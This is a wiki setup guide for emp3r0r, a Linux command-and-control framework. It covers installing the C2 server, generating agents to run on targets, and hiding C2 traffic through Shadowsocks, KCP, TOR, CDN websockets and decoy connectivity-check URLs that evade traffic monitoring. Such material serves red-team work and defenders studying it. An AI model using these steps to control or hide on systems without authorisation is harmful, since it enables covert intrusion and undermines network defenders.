Skip to content

Getting started

Jump to bottom Edit New page
Jing Mi edited this page Apr 11, 2022 · 47 revisions

CC (Command and Control)

This program includes a terminal UI, allowing you to navigate through emp3r0r's features and control your targets (agents)

Currently, emp3r0r supports:

  • Direct agent to CC connection using HTTP2
  • Connection through Shadowsocks with optional KCP (convert TCP to UDP) support
  • Connection through CDN using Websocket, no external program needed
  • Connection through TOR via external TOR proxy
  • Connection through upstream proxy server (HTTP, SOCKS, etc.)

Currently only x86_64 Linux is supported.

Configure C2 server and start C2 UI

Download the latest release from https://github.com/jm33-m0/emp3r0r/releases, emp3r0r-vX.X.X.tar.xz is the one to download.

Extract all files, run ./emp3r0r --install to install emp3r0r to your system. By default it installs to /usr/local/lib/emp3r0r, while the launcher ./emp3r0r itself is copied to /usr/local/bin, meaning the PREFIX variable is set to /usr/local.

If you wish to install emp3r0r to different locations, just run PREFIX=/usr ./emp3r0r --install, substitute /usr with the directory you want to use. Typically, when installing as a user managed software, you are supposed to use /usr/local , to make it easier to maintain. If you install emp3r0r from a deb package or something similar, it will install to /usr.

After successful installation, you should be able to execute emp3r0r from your current shell, the C2 UI will show if you have tmux installed.

On the first run, emp3r0r launcher script will generate CA and C2 server certificates, you will need to input desired C2 server names, they will be used by agents for server identification. If you plan to use your C2 server for more than one IPs or domains, you should input them like example.com 192.168.0.1 TOROnionSiteName.onion

If you intend to make the server certificate valid for multiple domains/IPs (for example, a TOR domain and a normal domain), you can do that by adding multiple C2 addresses when prompted.

Direct connection (HTTP2 via TLS)

There's nothing to configure, when C2 is started, type gen_agent to generate an agent binary, follow on-screen instructions.

Shadowsocks (Obfuscated TCP)

Shadowsocks is well-known by users living under heavily-censored Internet (China, Iran, etc). It basically erases everything that can be used as identifier of its traffic, in other words, it tries to defeat DPI. When you enable Shadowsocks in your emp3r0r agent, the C2 traffic will appear as encrypted TCP traffic, completely random and hard to find by traffic monitoring systems.

KCP

KCP exists to optimize your connection quality, as it says on its homepage

Millions of devices(from low-end MIPS routers to high-end servers) have deployed kcp-go powered program in a variety of forms like online games, live broadcasting, file synchronization and network acceleration.

Seems quite useful for C2s as well, doesn't it?

KCP converts C2 traffic to UDP and encrypt/obfuscate it just like Shadowsocks does. When UDP is not restricted in your target network, KCP can dramatically improve the C2 connection quality, and as a bonus, be stateless (a key feature of UDP).

KCP can be optionally enabled when you enable Shadowsocks.

emp3r0r will generate randomized Shadowsocks configs for you automatically.

TOR

To use TOR, you have to set up a hidden service first

Note: TOR hidden service doesn't need a public IP address to work, you can just run your service from anywhere

Assuming your hidden service is configured as:

# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 443 127.0.0.1:8000

TOR domain name:

❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onion

When generating C2 server certificate, make sure you include the onion address.

To generate an agent that uses the onion address as C2, type gen_agent and set C2 address accordingly.

CDN

First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.

I assume you already knew how to configure a CDN for your website. Here we put our CC server behind Nginx:

       HTTP2           websocket in TLS        websocket          websocket                       HTTP2
agent -------> socks5 ------------------> CDN -----------> Nginx ----------> CC websocket server -------> CC

Nginx config:

# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
    proxy_pass http://127.0.0.1:9000/ws;
    proxy_redirect off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;

    # Show realip
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

Likewise, make sure the C2 address is set when generating certificates and when using gen_agent.

To run CC server with CDN support enabled:

emp3r0r -cdn2proxy 9000 # 9000 is the listening port of websocket server

Agent (runs on your targets)

Generate agents

Generate an agent binary for a target

In emp3r0r's console, type gen_agent to build agent binaries, follow on-screen instructions.

Run the generated agent binary (under ~/.emp3r0r) on target host.

Upgrade agent on a target

When the target is connected, type upgrade_agent, the target will reconnect with the new version.

Configurable options

CC Indicator

This is a URL that works like Windows's NCSI connectivity check, it's designed to hide the actual C2 traffic.

You can configure this URL to some legit site such as https://github.com/jm33-m0/emp3r0r, or some other sites that are considered legit in your target network.

When this option is enabled, agents will request the pre-configured URL, expecting to find a certain text pattern in server's response, when it's found, agents continue to connect to the actual C2 server, if not found, agents will sleep for a pre-configured time span and repeat the process.

Agent proxy

You can specify (hardcode) a proxy address into your agent binary when using gen_agent

If you didn't do that, use ./agent -proxy 'socks5://ip:port' instead

Auto proxy

Use UDP broadcasting to communicate and form proxy chain to gain Internet access.

Can be disabled if you don't want the agent to send noisy UDP traffic (you can adjust the time interval via broadcast_interval_min and broadcast_interval_max as well)

Reverse proxy

This is not a build-time option, but since I have mentioned auto-proxy, I will explain this as well.

This works like ssh -R, one connected agent initiates a connection towards another agent (that cannot send outbound traffic), and use that connection to provide SOCKS5 proxy for target agent so it can reach C2.

DoH server

Use DNS over HTTPS in agent, to secure our DNS requests, you can opt out if this is not a concern or DoH is unavailable

Direct connection

To run agent with direct connection to CC server, just ./agent, if you want more control:

❯ ./agent -h
Usage of ./agent:
  -cdnproxy string
        CDN proxy for emp3r0r agent's C2 communication
  -daemon
        Daemonize
  -doh string
        DNS over HTTPS server for CDN proxy's DNS requests
  -proxy string
        Proxy for emp3r0r agent's C2 communication
  -silent
        Suppress output

I recommend hardcode these variables when using gen_agent.

TOR

Likewise, build the agent with onion domain name as CC host.

To run agent, you have to run TOR proxy first, I have a static tor binary for you

On your target, run ./agent, it will automatically use TOR proxy (socks5://127.0.0.1:9050)

Or if you want to use a different TOR proxy, type ./agent -proxy 'socks5://addr:port'

I recommend hardcode the proxy address when using gen_agent.

CDN

Same build proccess, use your domain name as CC IP

./agent -cdnproxy "wss://example.com/emp3r0r"

I recommend hardcode the proxy address when using gen_agent.

Add a custom footer
Add a custom sidebar
Clone this wiki locally